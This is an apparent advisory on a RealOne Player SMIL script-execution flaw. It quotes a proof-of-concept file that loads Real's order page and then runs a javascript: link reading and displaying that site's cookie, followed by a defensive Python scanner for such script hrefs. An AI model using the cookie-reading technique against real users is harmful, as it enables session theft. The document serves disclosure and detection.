RealOne Player SMIL File Script Execution Vulnerability
The following information regarding a proof of concept exploit has been taken verbatim from the DigitalPranksters advisory:

We have created a SMIL file that will read the cookie from https://order.real.com/pt/order.html. The cookie will be read 9 seconds after the audio has begun.

Source Code:

    <smil xmlns="http://www.w3.org/2001/SMIL20/Language"
          xmlns:rn="http://features.real.com/2001/SMIL20/Extensions">
      <head>
        <meta name="title" content="DigitalPranksters.com Proof of Concept"/>
        <meta name="author" content="DigitalPranksters.com"/>
        <meta name="copyright" content="(c)2003 DigitalPranksters.com"/>
      </head>
      <body>
        <audio src="http://radio.real.com/RGX/def.def...RGX/www.smgradio.com/core/audio/real/live.ram?service=vr">
          <area href="https://order.real.com/pt/order.html"
                begin="1s" external="true" actuate="onLoad"
                sourcePlaystate="play" rn:sendTo="_rpcontextwin">
            <rn:param name="width" value="10"/>
            <rn:param name="height" value="10"/>
          </area>
          <area href="javascript:alert('Hi there! I\'m a digital prankster. I just read your cookie from ' + document.domain + ' over the ' + location.protocol + '// protocol.\n\nThe value was:\n' + document.cookie + '\n\nHave a nice day.')"
                begin="9s" external="true" actuate="onLoad"
                sourcePlaystate="play" rn:sendTo="_rpcontextwin"/>
        </audio>
      </body>
    </smil>
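A defensive check for the pattern in the advisory's file, added here as an example (not code from the advisory or from RealNetworks): it parses a SMIL file and reports every `href` that uses a script scheme, together with the web pages sent to the same `rn:sendTo` target. The sample input, its hosts, the function names and the list of script schemes are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Namespace of the rn: extension attributes, as declared in the advisory's file.
RN_NS = "http://features.real.com/2001/SMIL20/Extensions"
SCRIPT_SCHEMES = {"javascript", "vbscript"}  # assumption: schemes treated as script

# Constructed sample with hypothetical hosts; this is not the advisory's file.
SAMPLE = """<smil xmlns="http://www.w3.org/2001/SMIL20/Language"
      xmlns:rn="http://features.real.com/2001/SMIL20/Extensions">
  <body>
    <audio src="http://media.example/stream.ram">
      <area href="https://shop.example/order.html" begin="1s"
            rn:sendTo="_rpcontextwin"/>
      <area href="JavaScript:void(0)" begin="9s" rn:sendTo="_rpcontextwin"/>
      <area href="http://media.example/info.html" begin="2s"/>
    </audio>
  </body>
</smil>"""


def scheme_of(href):
    """Return the lower-cased URL scheme, ignoring surrounding whitespace."""
    href = href.strip()
    return href.split(":", 1)[0].lower() if ":" in href else ""


def scan_smil(text):
    """Flag script-scheme hrefs and list the web pages sent to the same
    rn:sendTo target, i.e. the pages whose context the script could run in."""
    root = ET.fromstring(text)
    pages, scripts = {}, []
    for el in root.iter():
        href = el.get("href")
        if href is None:
            continue
        target = el.get("{%s}sendTo" % RN_NS, "")  # "" when no target is set
        scheme = scheme_of(href)
        if scheme in SCRIPT_SCHEMES:
            scripts.append((el.tag.rsplit("}", 1)[-1], scheme, target))
        elif scheme in ("http", "https"):
            pages.setdefault(target, []).append(href.strip())
    return [{"element": tag, "scheme": scheme, "target": target,
             "context_urls": pages.get(target, [])}
            for tag, scheme, target in scripts]


if __name__ == "__main__":
    for finding in scan_smil(SAMPLE):
        print(finding)
```

Pages are grouped by target rather than by document order, so a script `href` is reported with its context page regardless of the `begin` values.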